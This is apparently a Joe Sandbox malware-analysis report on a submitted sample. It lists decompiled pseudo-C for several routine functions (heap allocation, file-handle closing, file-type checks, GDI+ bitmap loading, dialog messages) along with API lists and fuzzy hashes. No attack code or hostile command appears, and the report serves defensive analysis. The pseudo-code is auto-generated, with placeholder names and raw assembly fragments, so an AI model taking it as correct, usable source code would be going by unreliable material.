                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 1e40b60d94a28d5f3c96a2b7002895695859f125173868bf559463d3a7defac2
                                                        • Instruction ID: a1a91527436d360ec7ae2f0213b58f379489b55efeca6fd779c15e67967f72dc
                                                        • Opcode Fuzzy Hash: 1e40b60d94a28d5f3c96a2b7002895695859f125173868bf559463d3a7defac2
                                                        • Instruction Fuzzy Hash: E021AE71C0828D9ECF11DF98DA915EEB7F4BF29304F0044AEE809A7242D7356E45CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09477 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E00A09477(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E00A1E554(E00A32153, _t42);
				E00A01380(_t42 - 0x20, E00A07EEC());
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E00A0CC70( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E00A0CE55( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_t40 = E00A0CC70( *((intOrPtr*)(_t42 + 8)),  *((intOrPtr*)(_t42 - 0x20)),  *((intOrPtr*)(_t42 - 0x1c)));
					} while (_t40 > 0);
				}
				_t21 = E00A015C2(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}











                                                        0x00a09477
                                                        0x00a0947c
                                                        0x00a0948e
                                                        0x00a0949c
                                                        0x00a094a5
                                                        0x00a094a9
                                                        0x00a094ac
                                                        0x00a094b0
                                                        0x00a094b3
                                                        0x00a094b3
                                                        0x00a094b5
                                                        0x00a094b6
                                                        0x00a094b8
                                                        0x00a094c0
                                                        0x00a094c0
                                                        0x00a094c4
                                                        0x00a094cd
                                                        0x00a094d4
                                                        0x00a094d5
                                                        0x00a094d7
                                                        0x00a094d7
                                                        0x00a094e7
                                                        0x00a094e9
                                                        0x00a094ee
                                                        0x00a094f2
                                                        0x00a094fb
                                                        0x00a09505

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 60fd6af579a5042d1bfc61fef776f63da98760c7dd663f92d8b425f0c3220d6b
                                                        • Instruction ID: 29e8f8a5b3d8bc5a92bf522238bec2058524224eb8d193e39d271ccaa2d63fa6
                                                        • Opcode Fuzzy Hash: 60fd6af579a5042d1bfc61fef776f63da98760c7dd663f92d8b425f0c3220d6b
                                                        • Instruction Fuzzy Hash: 5E118E73A0152C9BCF22AFA8ED919EEB736EF48750F004255F915A72A2CA359D0587A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D3B2 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E00A1D3B2(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E00A1E554(E00A32338, _t43);
				_push(_t26);
				E00A1E630();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00A25AD6(0xa54872, "X");
				E00A10188(0xa56894, _t37, 0xa335b0);
				E00A25AD6(0xa55892,  *((intOrPtr*)(_t43 + 0xc)));
				E00A05BD9(0xa4c578, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0xa53850 = _t18;
				 *0xa5384c = _t18;
				 *0xa53848 = _t18;
				_t19 =  *0xa48461; // 0x0
				 *0xa526cf = _t19;
				_t20 =  *0xa48462; // 0x0
				 *0xa5270c = 1;
				 *0xa5270f = 1;
				 *0xa526d0 = _t20;
				E00A07D8E(_t43 - 0x2110, _t37,  *_t4, 0xa4c578);
				 *(_t43 - 4) = 1;
				E00A07F05(_t43 - 0x2110, _t37,  *_t4);
				_t23 = E00A07E21(_t24, _t43 - 0x2110, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}













                                                        0x00a1d3b2
                                                        0x00a1d3b7
                                                        0x00a1d3bc
                                                        0x00a1d3c2
                                                        0x00a1d3c7
                                                        0x00a1d3ca
                                                        0x00a1d3d7
                                                        0x00a1d3e8
                                                        0x00a1d3f5
                                                        0x00a1d406
                                                        0x00a1d40b
                                                        0x00a1d40b
                                                        0x00a1d417
                                                        0x00a1d418
                                                        0x00a1d41d
                                                        0x00a1d422
                                                        0x00a1d427
                                                        0x00a1d42c
                                                        0x00a1d431
                                                        0x00a1d437
                                                        0x00a1d43e
                                                        0x00a1d445
                                                        0x00a1d44a
                                                        0x00a1d455
                                                        0x00a1d459
                                                        0x00a1d464
                                                        0x00a1d46e
                                                        0x00a1d479

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A1D3B7
                                                          • Part of subcall function 00A07D8E: __EH_prolog.LIBCMT ref: 00A07D93
                                                          • Part of subcall function 00A07D8E: new.LIBCMT ref: 00A07DD8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 0ea74c358fc4797b9a230af690ee8bade3401118d9c2d1d254accb662a16ba7c
                                                        • Instruction ID: e7bc709a8553073bc85ed4226dee9922638e2b316341d626145624140d5f55d6
                                                        • Opcode Fuzzy Hash: 0ea74c358fc4797b9a230af690ee8bade3401118d9c2d1d254accb662a16ba7c
                                                        • Instruction Fuzzy Hash: CA11C436D09354BEC714EBE8BC06BDC7BA4FB6A311F00419EF91453292DBB51A858F61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A28838 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E00A28838(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00A28C7A())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xa616ec, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00A286B4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00A2749D(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









                                                        0x00a28838
                                                        0x00a2883e
                                                        0x00a28844
                                                        0x00a28876
                                                        0x00a2887b
                                                        0x00a28881
                                                        0x00000000
                                                        0x00a28881
                                                        0x00a28848
                                                        0x00a2884a
                                                        0x00a2884a
                                                        0x00a28861
                                                        0x00a2886a
                                                        0x00a28872
                                                        0x00000000
                                                        0x00000000
                                                        0x00a28852
                                                        0x00a28854
                                                        0x00000000
                                                        0x00000000
                                                        0x00a28857
                                                        0x00a2885c
                                                        0x00a2885d
                                                        0x00a2885f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2885f
                                                        0x00000000

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23CF6,?,0000015D,?,?,?,?,00A251D2,000000FF,00000000,?,?), ref: 00A2886A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 381c8ddbefc634596a8bbdbe48ae01555fdf9f3aee7648f367c21c98dd127abb
                                                        • Instruction ID: f814ee111ff3799fa1beac189316acccfcf06f536a11c64dae96abae427567ef
                                                        • Opcode Fuzzy Hash: 381c8ddbefc634596a8bbdbe48ae01555fdf9f3aee7648f367c21c98dd127abb
                                                        • Instruction Fuzzy Hash: 0FE065396072319AD73177AEBD04B5B7A6C9B517E0F598130FC15A6092DF58DC0145E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A05B57 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E00A05B57(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E00A1E554(E00A32048, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E00A0B26D(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00A10166();
				 *(_t36 - 4) = 1;
				E00A10166();
				 *(_t36 - 4) = 2;
				E00A10166();
				 *(_t36 - 4) = 3;
				E00A10166();
				 *(_t36 - 4) = 4;
				E00A10166();
				 *(_t36 - 4) = 5;
				E00A05D4C(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






                                                        0x00a05b57
                                                        0x00a05b5c
                                                        0x00a05b61
                                                        0x00a05b63
                                                        0x00a05b65
                                                        0x00a05b68
                                                        0x00a05b6d
                                                        0x00a05b6d
                                                        0x00a05b77
                                                        0x00a05b82
                                                        0x00a05b86
                                                        0x00a05b91
                                                        0x00a05b95
                                                        0x00a05ba0
                                                        0x00a05ba4
                                                        0x00a05baf
                                                        0x00a05bb3
                                                        0x00a05bba
                                                        0x00a05bbe
                                                        0x00a05bc9
                                                        0x00a05bd3

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A05B5C
                                                          • Part of subcall function 00A0B26D: __EH_prolog.LIBCMT ref: 00A0B272
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 321ac061b2bcc7e67e22084cef4c983292b4f648856c4fa0554cbab28d7f4e82
                                                        • Instruction ID: fabf5e7a289b686d029169e265d2d702f4d2f5196064b4de8c1f50ae8022cdb8
                                                        • Opcode Fuzzy Hash: 321ac061b2bcc7e67e22084cef4c983292b4f648856c4fa0554cbab28d7f4e82
                                                        • Instruction Fuzzy Hash: B001D630A15684EAD704E7B8D6057DFF7B49F19304F00468DB94913282CBF81B48C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09870 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00A09870(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1a)) != _t16) {
					E00A06E07(0xa40f50, _t21 + 0x24);
				}
				return _t16;
			}





                                                        0x00a09872
                                                        0x00a09874
                                                        0x00a0987a
                                                        0x00a09880
                                                        0x00a09891
                                                        0x00a09896
                                                        0x00a09898
                                                        0x00a09898
                                                        0x00a0989a
                                                        0x00a0989a
                                                        0x00a0989e
                                                        0x00a098a4
                                                        0x00a098b4
                                                        0x00a098b4
                                                        0x00a098bd

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A0982C,?,?,?,?,00A31F81,000000FF), ref: 00A0988B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 541cb2207b9adaabd2171b766670fb20943f49dfe779958397916f7c5fe2e6c9
                                                        • Instruction ID: 8ee79782cfc717452ac5a5d99119fc1032afe5af1531965c7e64436d547ddfe4
                                                        • Opcode Fuzzy Hash: 541cb2207b9adaabd2171b766670fb20943f49dfe779958397916f7c5fe2e6c9
                                                        • Instruction Fuzzy Hash: D8F0BE30486B089FEB308B20E948793B7E49B17325F088B1ED1EA436E18365688D8B00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A6B9 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A0A6B9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00A0BB15(_a4) == 0) {
					_t12 = E00A0A7E7(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00A0A3D5( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00A0A3ED( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





                                                        0x00a0a6ba
                                                        0x00a0a6c2
                                                        0x00a0a6d0
                                                        0x00a0a6dd
                                                        0x00a0a6e5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a6e8
                                                        0x00a0a6f4
                                                        0x00a0a706
                                                        0x00a0a711
                                                        0x00000000
                                                        0x00a0a717
                                                        0x00a0a6d2
                                                        0x00000000

                                                        APIs
                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A0A6E8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CloseFind
                                                        • String ID:
                                                        • API String ID: 1863332320-0
                                                        • Opcode ID: 807a30b5460c59640f738153ea80f7c27187340bf9f9d5b8e764821789da4a8d
                                                        • Instruction ID: ba77e984be78ed169a20c8b336e59432ff1119de326a6e6e592b8360b1867f17
                                                        • Opcode Fuzzy Hash: 807a30b5460c59640f738153ea80f7c27187340bf9f9d5b8e764821789da4a8d
                                                        • Instruction Fuzzy Hash: 9EF08235408784ABCA626BB8A9447CB7BA06F2A371F04CA49F1FD521D2C3B554959723
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10957 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E00A10957() {
				void* __esi;
				void* _t2;

				L00A11663(); // executed
				_t2 = E00A11668();
				if(_t2 != 0) {
					_t2 = E00A06E63(_t2, 0xa40f50, 0xff, 0xff);
				}
				if( *0xa40f5c != 0) {
					_t2 = E00A06E63(_t2, 0xa40f50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





                                                        0x00a10959
                                                        0x00a1095e
                                                        0x00a1096f
                                                        0x00a10974
                                                        0x00a10974
                                                        0x00a10980
                                                        0x00a10985
                                                        0x00a10985
                                                        0x00a1098c
                                                        0x00a10994

                                                        APIs
                                                        • SetThreadExecutionState.KERNEL32 ref: 00A1098C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ExecutionStateThread
                                                        • String ID:
                                                        • API String ID: 2211380416-0
                                                        • Opcode ID: 4a3f6f127c061c654af83c5bddc5231b84047fdafd3f9f95a3c321ea2fc99985
                                                        • Instruction ID: b80c7400a4dfd49acf71157a73b0fb84d5141866414480de20d34058f9b32ee8
                                                        • Opcode Fuzzy Hash: 4a3f6f127c061c654af83c5bddc5231b84047fdafd3f9f95a3c321ea2fc99985
                                                        • Instruction Fuzzy Hash: 96D02B296142102DEA213334FA85FFE1A0A4FC3321F0C0071B20D522C3CB960CC7D7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A19FDB Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00A19FDB(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00A1E4DC();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00A19D6F(__eax, _a4, _a8); // executed
				return _t6;
			}





                                                        0x00a19fde
                                                        0x00a19fdf
                                                        0x00a19fe1
                                                        0x00a19fe6
                                                        0x00a19feb
                                                        0x00000000
                                                        0x00a19ffc
                                                        0x00a19ff5
                                                        0x00000000

                                                        APIs
                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00A19FE1
                                                          • Part of subcall function 00A19D6F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A19D90
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                        • String ID:
                                                        • API String ID: 1915507550-0
                                                        • Opcode ID: 1be1482ac2147708aedbcb5cadff49528507359555a760097fab3dd187c3424e
                                                        • Instruction ID: 7df49a95b1263c2889fb577d82eafca34f3803a5c76e9efa9eaa4ac5543d8274
                                                        • Opcode Fuzzy Hash: 1be1482ac2147708aedbcb5cadff49528507359555a760097fab3dd187c3424e
                                                        • Instruction Fuzzy Hash: C9D0A73161420D7ADF44AF648C12AFB7A98EB00300F004075BC04C9141EE72DD91E255
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09B29 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A09B29(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




                                                        0x00a09b2d
                                                        0x00a09b35
                                                        0x00a09b3e
                                                        0x00a09b4b
                                                        0x00a09b45
                                                        0x00a09b47
                                                        0x00a09b47
                                                        0x00a09b2f
                                                        0x00a09b31
                                                        0x00a09b31

                                                        APIs
                                                        • GetFileType.KERNELBASE(000000FF,00A09A27), ref: 00A09B35
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 52f22c30f8cd619445443d8908b4b4a3bd23a3077362dc37d7947eafc885141b
                                                        • Instruction ID: 41ea8b099938dbe302799726a8fc8beedf36112a3a602f8875ecb255f84d9a7b
                                                        • Opcode Fuzzy Hash: 52f22c30f8cd619445443d8908b4b4a3bd23a3077362dc37d7947eafc885141b
                                                        • Instruction Fuzzy Hash: 1DD0123111114895CF258B347D49097B652DB43376B38CAE4E025C40E2C722CD03F500
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D6D7 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1D6D7(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xa48458, 0x6a, 0x402, E00A0FDC7(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00A1AF04(); // executed
				return _t7;
			}




                                                        0x00a1d6fc
                                                        0x00a1d702
                                                        0x00a1d707

                                                        APIs
                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A1D6FC
